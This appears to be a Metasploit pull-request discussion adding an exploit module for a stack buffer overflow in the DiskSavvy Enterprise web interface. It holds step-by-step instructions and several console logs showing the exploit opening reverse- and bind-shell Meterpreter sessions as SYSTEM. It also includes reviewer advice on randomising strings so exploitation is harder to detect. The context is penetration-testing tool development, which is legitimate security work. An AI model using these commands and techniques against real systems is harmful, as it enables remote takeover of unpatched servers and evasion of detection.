Add module for DiskSavvy Enterprise (EDB-40854)

[sgabe]

This is an MSF port of https://www.exploit-db.com/exploits/40854/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise version 9.1.14 and 9.3.14. The vulnerable application is available for download at http://www.disksavvy.com/downloads.html and https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe.

Verification

• Start Disk Savvy Enterprise service
• Start Disk Savvy Enterprise client application
• Navigate to Tools > Advanced Options > Server
• Check Enable Web Server On Port 80 to start the web interface
• Start msfconsole
• Do use exploit/windows/http/disksavvy_get_bof
• Do set rhost ip
• Do check
• Verify that the target is vulnerable
• Do set payload windows/meterpreter/reverse_tcp
• Do set lhost ip
• Do run
• Verify that the Meterpreter session is opened

Test run results below for DiskSavvy Enterprise v9.1.14 on Windows XP SP3:

msf > use exploit/windows/http/disksavvy_get_bof
msf exploit(disksavvy_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: Disk Savvy Enterprise v9.1.14
[*] Sending stage (957999 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:1140) at 2017-01-19 13:38:18 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

Test run results below for DiskSavvy Enterprise v9.3.14 on Windows 7 SP1:

msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
rhost => 192.168.198.130
msf exploit(diskboss_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskSavvy Enterprise v9.3.14
[*] Sending stage (957999 bytes) to 192.168.198.133
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49379) at 2017-01-19 14:00:40 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BCJL9PJ5BF5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

[h00die]

I'm not familiar with the eggs, but should we do a random string here to find so its harder to detect exploitation?

[wvu]

That's a great idea.

[wvu]

Though I recommend setting badchars when you do it:

Rex::Text.rand_text_alpha(4, payload_badchars)

[h00die]

maybe a vprint_status('sending malicious request') or something so the user knows the exploit fired? figured vprint so its not always there. It can be frustrating when you throw an exploit, and see no feedback on the screen if you dont get a shell.

[h00die]

docs look good to me

[h00die]

9.3.14 is the most current version on the website. Unless your the edb author, was the company notified of the issue? Just want to get some back ground since there isn't a fixed version that I'm seeing.

[h00die]

Should be Exploit::CheckCode::Appears: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method#check-codes

[h00die]

Can we also throw in a vprint_status("Version Detected: #{version}") in this and the elsif.
If someone doesn't want to use auto target for some reason, this should tell them the version so they can set the target appropriately.

[h00die]

see above. In future versions of the software, id like to know what version is detected so i can go figure out the offset for myself. nice for debugging when things go awry

[h00die]

Worked for me.

msf > use exploit/windows/http/disksavvy_get_bof 
msf exploit(disksavvy_get_bof) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(disksavvy_get_bof) > set verbose true
verbose => true
payload => windows/meterpreter/bind_tcp
msf exploit(disksavvy_get_bof) > show options

Module options (exploit/windows/http/disksavvy_get_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.2.108    yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.2.108    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(disksavvy_get_bof) > check
[+] 192.168.2.108:80 The target is vulnerable.
msf exploit(disksavvy_get_bof) > exploit

[*] Automatically detecting the target...
[*] Started bind handler
[*] Selected Target: DiskSavvy Enterprise v9.1.14
[*] Sending stage (957487 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:39893 -> 192.168.2.108:4444) at 2017-01-20 22:43:50 -0500

meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Logged On Users : 2
Meterpreter     : x86/windows

I'll try another target once those changes get made but this is looking good so far!

[sgabe]

@h00die, @wvu-r7: I updated the module according to your suggestions. I am not the original author, so I don't know whether the vendor was properly notified.

[h00die]

msf > use exploit/windows/http/disksavvy_get_bof 
msf exploit(disksavvy_get_bof) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(disksavvy_get_bof) > set verbose true
verbose => true
msf exploit(disksavvy_get_bof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(disksavvy_get_bof) > check

[*] Version detected: Disk Savvy Enterprise v9.1.14
[*] 192.168.2.108:80 The target appears to be vulnerable.
msf exploit(disksavvy_get_bof) > exploit

[*] Automatically detecting the target...
[*] Started bind handler
[*] Selected target: DiskSavvy Enterprise v9.1.14
[*] Sending malicious request...
[*] Sending stage (957487 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:32833 -> 192.168.2.108:4444) at 2017-01-21 08:55:48 -0500

meterpreter > sysinfo
Computer        : WINXP
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Logged On Users : 2
Meterpreter     : x86/windows

[h00die]

i'm getting no love on 9.3.14 on Xp sp3

msf exploit(disksavvy_get_bof) > check

[*] Version detected: Disk Savvy Enterprise v9.3.14
[*] 192.168.2.108:80 The target appears to be vulnerable.
msf exploit(disksavvy_get_bof) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Selected target: DiskSavvy Enterprise v9.3.14
[*] Sending malicious request...
[*] Exploit completed, but no session was created.

service is crashing, but never a shell

[h00die]

hmm, bind shell didn't work, reverse did.

msf exploit(disksavvy_get_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(disksavvy_get_bof) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(disksavvy_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.2.117:4444 
[*] Automatically detecting the target...
[*] Selected target: DiskSavvy Enterprise v9.3.14
[*] Sending malicious request...
[*] Sending stage (957487 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1212) at 2017-01-21 09:05:20 -0500

Any ideas on why bind is working for 9.1.14 and not 9.3.14? wondering if its a space issue or not

[h00die]

seems to be working now... i'll land this shortly!

[h00die]

Release Notes

An exploit has been added for Disk Savvy Enterprise 9.1.14 and 9.3.14, a Windows based disk space analyzer with a web interface that has a stack based buffer ov

[h00die]

@sgabe thanks for the submission, this looked pretty darn good from the beginning!

[wvu]

For the future: since you're using Msf::Exploit#rand_text_alpha and not Rex::Text::rand_text_alpha, you don't need to specify payload_badchars, since it's implied.